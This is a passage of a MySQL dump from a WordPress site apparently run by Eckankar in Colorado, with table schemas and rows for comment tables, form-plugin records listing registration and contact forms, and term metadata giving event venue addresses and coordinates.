  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_comments`
--

LOCK TABLES `wpcl_comments` WRITE;
/*!40000 ALTER TABLE `wpcl_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_comments` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_comments` with 0 row(s)
--

--
-- Table structure for table `wpcl_actionscheduler_groups`
--

DROP TABLE IF EXISTS `wpcl_actionscheduler_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_actionscheduler_groups` (
  `group_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(255) NOT NULL,
  PRIMARY KEY (`group_id`),
  KEY `slug` (`slug`(191))
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_actionscheduler_groups`
--

LOCK TABLES `wpcl_actionscheduler_groups` WRITE;
/*!40000 ALTER TABLE `wpcl_actionscheduler_groups` DISABLE KEYS */;
INSERT INTO `wpcl_actionscheduler_groups` VALUES (1,'wpforms'),(2,'action-scheduler-migration'),(3,'wp_mail_smtp');
/*!40000 ALTER TABLE `wpcl_actionscheduler_groups` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_actionscheduler_groups` with 3 row(s)
--

--
-- Table structure for table `wpcl_nf3_forms`
--

DROP TABLE IF EXISTS `wpcl_nf3_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_nf3_forms` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` longtext DEFAULT NULL,
  `key` longtext DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `updated_at` datetime DEFAULT NULL,
  `views` int(11) DEFAULT NULL,
  `subs` int(11) DEFAULT NULL,
  `form_title` longtext DEFAULT NULL,
  `default_label_pos` varchar(15) DEFAULT NULL,
  `show_title` bit(1) DEFAULT NULL,
  `clear_complete` bit(1) DEFAULT NULL,
  `hide_complete` bit(1) DEFAULT NULL,
  `logged_in` bit(1) DEFAULT NULL,
  `seq_num` int(11) DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=64 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_nf3_forms`
--

LOCK TABLES `wpcl_nf3_forms` WRITE;
/*!40000 ALTER TABLE `wpcl_nf3_forms` DISABLE KEYS */;
INSERT INTO `wpcl_nf3_forms` VALUES (1,'Contact Me',NULL,'2023-05-11 05:04:57','2019-07-15 13:38:56',NULL,NULL,'Contact Me','above',0x01,0x01,0x01,0x00,3),(2,' Loveland Initiators and ESA\'s',NULL,'2019-07-15 21:03:44',NULL,NULL,NULL,' Loveland Initiators and ESA\'s','above',0x00,0x01,0x01,0x00,2),(4,'Add or Update Email or Address - Member',NULL,'2023-11-14 03:04:23',NULL,NULL,NULL,'Add or Update Email or Address - Member','above',0x00,0x01,0x01,0x00,39),(5,'Alamosa Initiators and ESAs',NULL,'2019-07-15 21:04:34',NULL,NULL,NULL,'Alamosa Initiators and ESAs','above',0x00,0x01,0x01,0x00,18),(6,'Boulder Area Initiator and ESAs',NULL,'2023-07-02 15:57:30',NULL,NULL,NULL,'Boulder Area Initiator and ESAs','above',0x00,0x01,0x01,0x00,7),(8,'Central Colorado Leadership Communications',NULL,'2022-10-05 18:42:48',NULL,NULL,NULL,'Central Colorado Leadership Communications','above',0x00,0x01,0x01,0x00,19),(9,'Chela Ideas',NULL,'2023-01-01 20:38:08',NULL,NULL,NULL,'Chela Ideas','above',0x00,0x01,0x01,0x00,3),(10,'Colorado RESA Organization Communications',NULL,'2023-08-13 22:27:56',NULL,NULL,NULL,'Colorado RESA Organization Communications','above',0x00,0x01,0x01,0x00,27),(11,'Colorado Springs Initiators and ESAs',NULL,'2022-10-07 18:38:17',NULL,NULL,NULL,'Colorado Springs Initiators and ESAs','above',0x00,0x01,0x01,0x00,4),(12,'Colorado Springs Leadership Communications',NULL,'2023-01-10 17:19:11',NULL,NULL,NULL,'Colorado Springs Leadership Communications','above',0x00,0x01,0x01,0x00,4),(13,'Eckankar In Colorado Contact Form',NULL,'2023-10-29 02:30:27',NULL,NULL,NULL,'Eckankar In Colorado Contact Form','above',0x00,0x01,0x01,0x00,150),(14,'Johnstown Area Initiators and ESAs',NULL,'2018-01-03 20:34:29',NULL,NULL,NULL,'Johnstown Area Initiators and ESAs','above',0x00,0x01,0x01,0x00,NULL),(15,'Longmont Initiators and ESAs',NULL,'2019-07-15 21:06:12',NULL,NULL,NULL,'Longmont Initiators and ESAs','above',0x00,0x01,0x01,0x00,NULL),(16,'Loveland Leadership Communications',NULL,'2019-07-15 21:06:21',NULL,NULL,NULL,'Loveland Leadership Communications','above',0x00,0x01,0x01,0x00,4),(17,'MEMBER NEWSLETTER SUBSCRIPTION',NULL,'2023-10-15 15:43:41',NULL,NULL,NULL,'MEMBER NEWSLETTER SUBSCRIPTION','above',0x00,0x01,0x01,0x00,26),(18,'Mountain Area Leadership Communications',NULL,'2019-07-15 21:06:45',NULL,NULL,NULL,'Mountain Area Leadership Communications','above',0x00,0x01,0x01,0x00,NULL),(19,'Northwest Mountain Area Initiators and ESAs',NULL,'2019-07-15 21:06:58',NULL,NULL,NULL,'Northwest Mountain Area Initiators and ESAs','above',0x00,0x01,0x01,0x00,NULL),(20,'Parker Initiators and ESAs',NULL,'2023-03-30 14:05:18',NULL,NULL,NULL,'Parker Initiators and ESAs','above',0x00,0x01,0x01,0x00,6),(21,'Public Newsletter Subscription',NULL,'2023-11-10 02:39:08',NULL,NULL,NULL,'Public Newsletter Subscription','above',0x00,0x01,0x01,0x00,191),(22,'Pueblo Initiators and ESAs',NULL,'2019-07-15 21:07:28',NULL,NULL,NULL,'Pueblo Initiators and ESAs','above',0x00,0x01,0x01,0x00,NULL),(23,'Southwest Mountain Area Initiators and ESA\'s',NULL,'2019-07-15 21:07:37',NULL,NULL,NULL,'Southwest Mountain Area Initiators and ESA\'s','above',0x00,0x01,0x01,0x00,NULL),(24,'Volunteer for ECK',NULL,'2019-07-15 21:07:54',NULL,NULL,NULL,'Volunteer for ECK','above',0x00,0x01,0x01,0x00,NULL),(25,'Webmaster Contact Form',NULL,'2019-07-15 21:08:05',NULL,NULL,NULL,'Webmaster Contact Form','above',0x00,0x01,0x01,0x00,NULL),(30,'Western Slope Leadership Communication',NULL,'2018-01-03 20:07:41',NULL,NULL,NULL,'Western Slope Leadership Communication','above',0x00,0x01,0x01,0x00,NULL),(32,'Central Colorado Initiator and ESAs',NULL,'2019-08-08 03:08:36',NULL,NULL,NULL,'Central Colorado Initiator and ESAs','above',0x00,0x01,0x01,0x00,5),(33,'Contact Me',NULL,'2016-08-24 23:39:20',NULL,NULL,NULL,'Contact Me','above',0x01,0x01,0x01,0x00,NULL),(34,'Youth and Family Contact Form',NULL,'2019-09-21 02:37:28',NULL,NULL,NULL,'Youth and Family Contact Form','above',0x00,0x01,0x01,0x00,8),(35,'Colorado Springs Area Contact Form',NULL,'2023-04-30 03:20:47',NULL,NULL,NULL,'Colorado Springs Area Contact Form','above',0x00,0x01,0x01,0x00,51),(38,'Spiritual Services - Contact',NULL,'2020-12-08 23:42:53',NULL,NULL,NULL,'Spiritual Services - Contact','above',0x00,0x01,0x01,0x00,5),(39,'Mountain Areas Contact Form',NULL,'2023-02-23 05:14:09',NULL,NULL,NULL,'Mountain Areas Contact Form','above',0x00,0x01,0x01,0x00,8),(41,'Central Colorado Leadership Communications -TESTING COPY ONLY!!!!',NULL,'2023-07-04 09:33:18',NULL,NULL,NULL,'Central Colorado Leadership Communications -TESTING COPY ONLY!!!!','above',0x00,0x01,0x01,0x00,8),(42,'Online Event Registration',NULL,'2021-02-25 21:48:10',NULL,NULL,NULL,'Online Event Registration','above',0x00,0x01,0x01,0x00,NULL),(44,'Sound of Soul Event Registration',NULL,'2022-03-06 04:51:25',NULL,NULL,NULL,'Sound of Soul Event Registration','above',0x00,0x01,0x01,0x00,24),(46,'ECK Light and Sound Service Registration',NULL,'2022-05-08 16:43:38',NULL,NULL,NULL,'ECK Light and Sound Service Registration','above',0x00,0x01,0x01,0x00,54),(47,'Event Registration',NULL,'2016-08-28 23:16:05',NULL,NULL,NULL,'Event Registration','above',0x01,0x01,0x01,0x00,NULL),(48,'Book Discussion Registration: Autobiography of a Modern Prophet',NULL,'2022-03-15 15:20:11',NULL,NULL,NULL,'Book Discussion Registration: Autobiography of a Modern Prophet','above',0x00,0x01,0x01,0x00,16),(49,'Loveland Area - Contact Form',NULL,'2023-06-18 16:27:24',NULL,NULL,NULL,'Loveland Area - Contact Form','above',0x00,0x01,0x01,0x00,13),(50,'Questionnaire',NULL,'2021-07-08 14:47:20',NULL,NULL,NULL,'Questionnaire','above',0x00,0x01,0x01,0x00,NULL),(51,'Loveland - Book Discussion Registration: Autobiography of a Modern Prophet',NULL,'2021-12-30 20:41:00',NULL,NULL,NULL,'Loveland - Book Discussion Registration: Autobiography of a Modern Prophet','above',0x00,0x01,0x01,0x00,9),(53,'Add or Update Email or Address - Public',NULL,'2023-11-14 00:11:57',NULL,NULL,NULL,'Add or Update Email or Address - Public','above',0x00,0x01,0x01,0x00,17),(54,'Satsang Intensive Registration',NULL,'2022-03-02 16:06:10',NULL,NULL,NULL,'Satsang Intensive Registration','above',0x00,0x01,0x01,0x00,2),(55,'Event Registration',NULL,'2016-08-28 23:16:05',NULL,NULL,NULL,'Event Registration','above',0x01,0x01,0x01,0x00,NULL),(56,'ECK Temple \'Beautify Day\' - May 14, 2022',NULL,'2022-05-10 15:52:23',NULL,NULL,NULL,'ECK Temple \'Beautify Day\' - May 14, 2022','above',0x00,0x01,0x01,0x00,10),(60,'TEST-RECAPTCHA V3 - PUBLIC FORM--TEST ONLY',NULL,'2022-09-21 06:27:15',NULL,NULL,NULL,'TEST-RECAPTCHA V3 - PUBLIC FORM--TEST ONLY','above',0x00,0x01,0x01,0x00,NULL),(61,'Satsang Class Registration-2023-2024',NULL,'2023-11-21 09:19:55',NULL,NULL,NULL,'Satsang Class Registration-2023-2024','above',0x00,0x01,0x01,0x00,123),(62,'Initiators and ESA\'s - TESTING ONLY!!!!!!!!',NULL,'2023-07-04 16:22:26',NULL,NULL,NULL,'Initiators and ESA\'s - TESTING ONLY!!!!!!!!','above',0x00,0x01,0x01,0x00,6),(63,'Satsang Class Registration- ALL CLASSES TEMPLATE --DO NOT DELETE',NULL,'2023-09-05 15:39:18',NULL,NULL,NULL,'Satsang Class Registration- ALL CLASSES TEMPLATE --DO NOT DELETE','above',0x00,0x01,0x01,0x00,NULL);
/*!40000 ALTER TABLE `wpcl_nf3_forms` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_nf3_forms` with 47 row(s)
--

--
-- Table structure for table `wpcl_termmeta`
--

DROP TABLE IF EXISTS `wpcl_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=349 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_termmeta`
--

LOCK TABLES `wpcl_termmeta` WRITE;
/*!40000 ALTER TABLE `wpcl_termmeta` DISABLE KEYS */;
INSERT INTO `wpcl_termmeta` VALUES (1,27,'folder_type','default'),(2,27,'folder_position','0'),(3,28,'wcp_custom_order','11'),(4,29,'wcp_custom_order','42'),(6,31,'wcp_custom_order','16'),(7,32,'wcp_custom_order','34'),(8,33,'wcp_custom_order','24'),(9,34,'wcp_custom_order','26'),(10,35,'wcp_custom_order','10'),(11,36,'wcp_custom_order','12'),(13,37,'wcp_custom_order','9'),(15,39,'wcp_custom_order','40'),(16,40,'wcp_custom_order','32'),(17,41,'wcp_custom_order','22'),(19,42,'wcp_custom_order','13'),(20,43,'wcp_custom_order','29'),(21,44,'wcp_custom_order','43'),(22,45,'wcp_custom_order','48'),(23,46,'wcp_custom_order','8'),(25,48,'wcp_custom_order','41'),(26,49,'wcp_custom_order','27'),(27,50,'wcp_custom_order','28'),(28,51,'wcp_custom_order','37'),(29,52,'wcp_custom_order','44'),(321,44,'folder_info','a:1:{s:9:\"is_active\";s:1:\"1\";}'),(33,54,'wcp_custom_order','7'),(34,56,'wcp_custom_order','15'),(35,57,'wcp_custom_order','49'),(36,58,'wcp_custom_order','1'),(38,59,'wcp_custom_order','36'),(39,60,'wcp_custom_order','33'),(40,61,'wcp_custom_order','39'),(45,99,'wcp_custom_order','38'),(320,31,'folder_info','a:1:{s:9:\"is_active\";s:1:\"1\";}'),(48,101,'wcp_custom_order','14'),(49,103,'wcp_custom_order','45'),(50,104,'wcp_custom_order','31'),(51,105,'wcp_custom_order','17'),(52,108,'wcp_custom_order','47'),(53,109,'wcp_custom_order','23'),(54,110,'mec_cat_icon',''),(55,110,'mec_cat_fallback_image',''),(56,111,'mec_cat_icon',''),(57,111,'mec_cat_fallback_image',''),(58,112,'mec_cat_icon',''),(59,112,'mec_cat_fallback_image',''),(60,113,'mec_cat_icon',''),(61,113,'mec_cat_fallback_image',''),(62,114,'mec_cat_icon',''),(63,114,'mec_cat_fallback_image',''),(64,115,'mec_cat_icon',''),(65,115,'mec_cat_fallback_image',''),(66,116,'mec_cat_icon',''),(67,116,'mec_cat_fallback_image',''),(68,117,'mec_cat_icon',''),(69,117,'mec_cat_fallback_image',''),(70,118,'address',''),(71,118,'latitude','0'),(72,118,'longitude','0'),(73,118,'url',''),(74,118,'thumbnail',''),(75,119,'address',''),(76,119,'latitude','0'),(77,119,'longitude','0'),(78,119,'url',''),(79,119,'thumbnail',''),(80,120,'address',''),(81,120,'latitude','0'),(82,120,'longitude','0'),(83,120,'url',''),(84,120,'thumbnail',''),(85,121,'address','740 W. 15th St., Pueblo CO 81003'),(86,121,'latitude','38.28067963363341'),(87,121,'longitude','-104.61755423175397'),(88,121,'url',''),(89,121,'thumbnail',''),(90,122,'address','7100 W. Mississippi Avenue, Lakewood CO 80226'),(91,122,'latitude','39.6962623'),(92,122,'longitude','-105.0758803'),(93,122,'url',''),(94,122,'thumbnail',''),(95,123,'address','1135 North Lincoln Avenue, Unit 5, Loveland CO 80537'),(96,123,'latitude','0'),(97,123,'longitude','0'),(98,123,'url',''),(99,123,'thumbnail',''),(100,124,'wcp_custom_order','3'),(102,126,'wcp_custom_order','25'),(103,1,'latitude','0'),(104,1,'longitude','0'),(105,127,'wcp_custom_order','20'),(106,128,'wcp_custom_order','1'),(107,129,'address','7100 W. Mississippi Avenue, Lakewood CO 80226'),(108,129,'latitude','39.6962623'),(109,129,'longitude','-105.0758803'),(110,129,'url',''),(111,129,'thumbnail',''),(112,130,'created_by','2'),(113,130,'wcp_custom_order','2'),(114,131,'address','230 Port Ave, Pagosa Springs, Colorado, USA'),(115,131,'latitude','37.247869180648046'),(116,131,'longitude','-107.09673836062566'),(117,131,'url',''),(118,131,'thumbnail',''),(119,132,'address','848 E 3rd Ave, Durango, Colorado, USA'),(120,132,'latitude','37.27228'),(121,132,'longitude','-107.87764'),(122,132,'url',''),(123,132,'thumbnail',''),(124,133,'created_by','2'),(125,133,'wcp_custom_order','1'),(127,134,'doc_category_order','1'),(128,134,'doc_category_image-id',''),(129,135,'doc_category_order','2'),(130,135,'doc_category_image-id',''),(131,136,'doc_category_order','3'),(132,136,'doc_category_image-id',''),(133,137,'doc_category_order','4'),(134,137,'doc_category_image-id',''),(145,141,'address',''),(146,141,'latitude','0'),(147,141,'longitude','0'),(148,141,'url',''),(149,141,'thumbnail',''),(150,142,'created_by','2'),(151,142,'wcp_custom_order','35'),(152,144,'address','8105 South 700 East, Sandy, Utah 84070, USA'),(153,144,'latitude','40.604099491495'),(154,144,'longitude','-111.87176718687'),(155,144,'url',''),(156,144,'thumbnail',''),(157,145,'address','In Person'),(158,145,'latitude','0'),(159,145,'longitude','0'),(160,145,'url',''),(161,145,'thumbnail',''),(162,146,'address',''),(163,146,'latitude','40.004718179992'),(164,146,'longitude','-105.28840890066'),(165,146,'url',''),(166,146,'thumbnail',''),(167,147,'address','256 East 2nd Street, Loveland, CO 80537, USA'),(168,147,'latitude','40.393321225683'),(169,147,'longitude','-105.07349970496'),(170,147,'url',''),(171,147,'thumbnail',''),(174,149,'address','2500 Main Avenue, Durango, CO, USA'),(175,149,'latitude','37.291382850572'),(176,149,'longitude','-107.87287657586'),(177,149,'url',''),(178,149,'thumbnail',''),(179,150,'created_by','2'),(180,150,'wcp_custom_order','19'),(183,160,'created_by','2'),(184,160,'wcp_custom_order','4'),(185,161,'address','848 E 3rd Ave, Durango, Colorado'),(186,161,'latitude','37.2722977'),(187,161,'longitude','-107.877663'),(188,161,'url',''),(189,161,'thumbnail',''),(190,162,'address','1301 Second Avenue South, Minneapolis, MN 55403'),(191,162,'latitude','44.970458637989'),(192,162,'longitude','-93.273364973492'),(193,162,'url',''),(194,162,'thumbnail',''),(195,163,'address','5550 N Union Blvd, Colorado Springs, CO 80918'),(196,163,'latitude','38.85747715543221'),(197,163,'longitude','-104.91184413358626'),(198,163,'url',''),(199,163,'thumbnail',''),(200,164,'address','20 N Cascade Ave, Colorado Springs, CO 80903'),(201,164,'latitude','38.835501624931'),(202,164,'longitude','-104.82600246021'),(203,164,'url',''),(204,164,'thumbnail',''),(205,165,'address','470 S Martin St, Longmont, Colorado'),(206,165,'latitude','40.1539407'),(207,165,'longitude','-105.0921393'),(208,165,'url',''),(209,165,'thumbnail',''),(210,166,'address','300 N Adams Ave, Loveland, Colorado'),(211,166,'latitude','40.3949454'),(212,166,'longitude','-105.068345'),(213,166,'url',''),(214,166,'thumbnail',''),(215,167,'address','335 Pearl Street, Boulder, Colorado'),(216,167,'latitude','40.01598'),(217,167,'longitude','-105.29125'),(218,167,'url',''),(219,167,'thumbnail',''),(220,168,'created_by','2'),(221,168,'wcp_custom_order','30'),(222,169,'created_by','2'),(223,169,'wcp_custom_order','5'),(224,170,'address','20105 Mainstreet, Parker, Colorado'),(225,170,'latitude','39.51857'),(226,170,'longitude','-104.75453'),(227,170,'url',''),(228,170,'thumbnail',''),(229,171,'address','335 Pearl St, Boulder, CO 80302'),(230,171,'latitude','40.016113867761'),(231,171,'longitude','-105.29125756017'),(232,171,'url',''),(233,171,'thumbnail',''),(237,173,'wcp_custom_order','18'),(236,173,'created_by','2'),(238,174,'created_by','2'),(239,174,'wcp_custom_order','2'),(240,175,'created_by','2'),(241,175,'wcp_custom_order','3'),(243,176,'created_by','2'),(244,176,'wcp_custom_order','2'),(245,177,'created_by','2'),(246,177,'wcp_custom_order','1'),(247,178,'created_by','2'),(248,178,'wcp_custom_order','4'),(249,179,'created_by','2'),(250,179,'wcp_custom_order','1'),(319,32,'folder_info','a:1:{s:9:\"is_active\";s:1:\"1\";}'),(252,180,'created_by','2'),(253,180,'wcp_custom_order','21'),(254,181,'created_by','2'),(255,181,'wcp_custom_order','3'),(256,182,'address','San Juan River Walk, Pagosa Springs, CO 81147'),(257,182,'latitude','37.26556'),(258,182,'longitude','-107.011894'),(259,182,'url',''),(260,182,'thumbnail',''),(261,183,'address','1235 Bookcliff Avenue, Grand Junction, CO'),(262,183,'latitude','39.088174'),(263,183,'longitude','-108.552123'),(264,183,'url',''),(265,183,'thumbnail',''),(266,184,'address','5280 Arena Cir · Loveland, CO'),(267,184,'latitude','40.442593'),(268,184,'longitude','-104.98953'),(269,184,'url',''),(270,184,'thumbnail',''),(271,185,'address','5040 Corporate Plaza Dr Ste 5, Colorado Springs, CO 80919'),(272,185,'latitude','38.904609412665'),(273,185,'longitude','-104.86477944487'),(274,185,'url',''),(275,185,'thumbnail',''),(276,186,'address','Colorado Springs Event Center, 3960 Palmer Park Blvd, Colorado Springs, CO 80909'),(277,186,'latitude','38.855579725932'),(278,186,'longitude','-104.75420887555'),(279,186,'url',''),(280,186,'thumbnail',''),(281,187,'address','20105 East Main Street, Parker, CO'),(282,187,'latitude','39.518345'),(283,187,'longitude','-104.75378'),(284,187,'url',''),(285,187,'thumbnail',''),(290,189,'wcp_custom_order','6'),(289,189,'created_by','2'),(291,190,'color','#fb862c'),(292,190,'style',''),(293,191,'color','#3479a8'),(294,191,'style',''),(295,192,'color','#caca04'),(296,192,'style',''),(297,193,'address','3737 W 32nd Ave, Highland, Denver, CO'),(298,193,'latitude','39.762576711769'),(299,193,'longitude','-105.03670096168'),(300,193,'url',''),(301,193,'thumbnail',''),(302,194,'color','#e83a79'),(303,194,'style',''),(309,197,'style',''),(308,197,'color','#009e8b'),(310,198,'address','515 Manitou Ave, Manitou Springs, CO 80829'),(311,198,'opening_hour',''),(312,198,'latitude','38.85749386471207'),(313,198,'longitude','-104.9117475743627'),(314,198,'url',''),(315,198,'thumbnail',''),(316,121,'opening_hour',''),(317,163,'opening_hour',''),(318,131,'opening_hour',''),(322,52,'folder_info','a:1:{s:9:\"is_active\";s:1:\"0\";}'),(323,33,'folder_info','a:1:{s:9:\"is_active\";s:1:\"0\";}'),(324,34,'folder_info','a:1:{s:9:\"is_active\";s:1:\"0\";}'),(325,108,'folder_info','a:1:{s:9:\"is_active\";s:1:\"0\";}'),(326,174,'folder_info','a:1:{s:9:\"is_active\";s:1:\"1\";}'),(327,169,'folder_info','a:1:{s:9:\"is_active\";s:1:\"0\";}'),(328,162,'opening_hour',''),(329,199,'created_by','2'),(330,199,'wcp_custom_order','1'),(331,173,'is_active','1'),(332,173,'folder_info','a:1:{s:9:\"is_active\";s:1:\"1\";}'),(333,200,'address','409 4th Ave, Longmont, Colorado'),(334,200,'opening_hour',''),(335,200,'latitude','40°09\'54.7\"N'),(336,200,'longitude','105°06\'01.8\"W'),(337,200,'url',''),(338,200,'thumbnail',''),(339,201,'color','#6b7afb'),(340,201,'style',''),(341,202,'color','#00d315'),(342,202,'style',''),(343,203,'created_by','2'),(344,203,'wcp_custom_order','46'),(345,204,'color','#e22424'),(346,204,'style','mec-label-canceled'),(347,205,'created_by','2'),(348,205,'wcp_custom_order','1');
/*!40000 ALTER TABLE `wpcl_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_termmeta` with 306 row(s)
--

--
-- Table structure for table `wpcl_commentmeta`
--

DROP TABLE IF EXISTS `wpcl_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_commentmeta`
--

LOCK TABLES `wpcl_commentmeta` WRITE;
/*!40000 ALTER TABLE `wpcl_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_commentmeta` with 0 row(s)
--

--
-- Table structure for table `wpcl_cf_forms`
--

DROP TABLE IF EXISTS `wpcl_cf_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_cf_forms` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` varchar(18) NOT NULL DEFAULT '',
  `type` varchar(255) NOT NULL DEFAULT '',
  `config` longtext NOT NULL,
  PRIMARY KEY (`id`),
  KEY `form_id` (`form_id`)
) ENGINE=MyISAM AUTO_INCREMENT=48 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_cf_forms`
--

LOCK TABLES `wpcl_cf_forms` WRITE;
/*!40000 ALTER TABLE `wpcl_cf_forms` DISABLE KEYS */;
INSERT INTO `wpcl_cf_forms` VALUES (28,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 17:21:36 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email 